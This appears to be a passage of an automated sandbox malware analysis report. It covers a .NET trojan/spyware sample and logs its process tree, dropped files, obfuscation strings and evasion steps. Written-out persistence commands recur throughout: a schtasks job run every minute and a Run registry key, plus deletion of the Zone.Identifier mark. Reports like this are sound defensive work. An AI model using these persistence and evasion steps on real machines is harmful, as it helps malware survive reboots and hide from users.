                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3FBE702_2_0A3FBE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F43202_2_0A3F4320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3FBF522_2_0A3FBF52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F13802_2_0A3F1380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F90382_2_0A3F9038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F00402_2_0A3F0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F20902_2_0A3F2090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3FA6402_2_0A3FA640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3FA8302_2_0A3FA830
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F64E82_2_0A3F64E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 09EE5A68 appears 54 times
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_00D5F968 CreateProcessAsUserA,0_2_00D5F968
                  Source: excel.exe.2.drStatic PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
                  Source: pdP5Rv9pPW.exe, 00000000.00000002.375077653.00000000029E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerattSBVyJzEUoMgBuAZJkkSZn.exe4 vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exe, 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerattSBVyJzEUoMgBuAZJkkSZn.exe4 vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exe, 00000000.00000000.301105429.0000000000206000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAvLaunch.exeB vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exeBinary or memory string: OriginalFilenameAvLaunch.exeB vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: pdP5Rv9pPW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: fghn.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: fghn.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\excel\excel.exe 7BA4838E3356B69254730E891ADD84092E3143016A515FF3E990CE19874A2459
                  Source: pdP5Rv9pPW.exeVirustotal: Detection: 66%
                  Source: pdP5Rv9pPW.exeReversingLabs: Detection: 51%
                  Source: pdP5Rv9pPW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\pdP5Rv9pPW.exe "C:\Users\user\Desktop\pdP5Rv9pPW.exe"
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\fghn\fghn.exe C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeFile created: C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@32/7@0/1
                  Source: pdP5Rv9pPW.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: pdP5Rv9pPW.exe, CreateHotPool.csBase64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: 0.0.pdP5Rv9pPW.exe.190000.0.unpack, CreateHotPool.csBase64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: fghn.exe.9.dr, CreateHotPool.csBase64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4224:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4660:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_01
                  Source: 2.0.vbc.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 2.0.vbc.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: pdP5Rv9pPW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: pdP5Rv9pPW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: vbc.pdb source: vbc.exe, 00000002.00000003.370543337.000000000A09D000.00000004.00000800.00020000.00000000.sdmp, excel.exe, 0000000C.00000000.391226032.0000000001261000.00000020.00000001.01000000.00000007.sdmp, excel.exe.2.dr

                  Data Obfuscation

                  barindex
                  Binary or sample is protected by dotNetProtector
                  Source: pdP5Rv9pPW.exe, 00000000.00000000.301051021.0000000000192000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                  Source: pdP5Rv9pPW.exe, 00000000.00000000.301051021.0000000000192000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
                  Source: pdP5Rv9pPW.exeString found in binary or memory: dotNetProtector
                  Source: pdP5Rv9pPW.exeString found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
                  Source: fghn.exe.9.drString found in binary or memory: dotNetProtector
                  Source: fghn.exe.9.drString found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EB5CF0 push ebx; retf 0_2_04EBA826
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EB4C5D push esp; ret 0_2_04EB4C5E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EB4D2D push cs; retf 0_2_04EB4D4A
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04ECA4FE push edx; retf 0040h0_2_04ECA57E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04ECA9DE pushad ; ret 0_2_04ECAA1D
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EC0E89 push ebp; ret 0_2_04EC0E8C
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EDBC8F pushfd ; ret 0_2_04EDBC8E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EDB896 push ds; iretd 0_2_04EDB9AA
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EDBC5E pushfd ; ret 0_2_04EDBC8E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EDB829 push ds; iretd 0_2_04EDB9AA
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EDB813 push ds; iretd 0_2_04EDB9AA
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04F00EC0 push ds; ret 0_2_04F00EC3
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04F00287 push edi; iretd 0_2_04F0028A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE8860 push 8C09138Ch; retf 04F7h2_2_09EE9C3D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE9800 push 8C09138Ch; retf 04F7h2_2_09EE9C3D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A27122D push esp; iretd 2_2_0A27122E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A271397 pushad ; iretd 2_2_0A271398
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A2713EA push esp; iretd 2_2_0A2713EB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A27102B push esp; iretd 2_2_0A27102C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A272520 push edi; ret 2_2_0A272526
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A272177 push edi; retn 0000h2_2_0A272179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A2715E5 pushfd ; iretd 2_2_0A2715E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A2725DD push E904F7D0h; retn 0006h2_2_0A2725E2
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Roaming\excel\excel.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excelJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excelJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\excel\excel.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\excel\excel.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
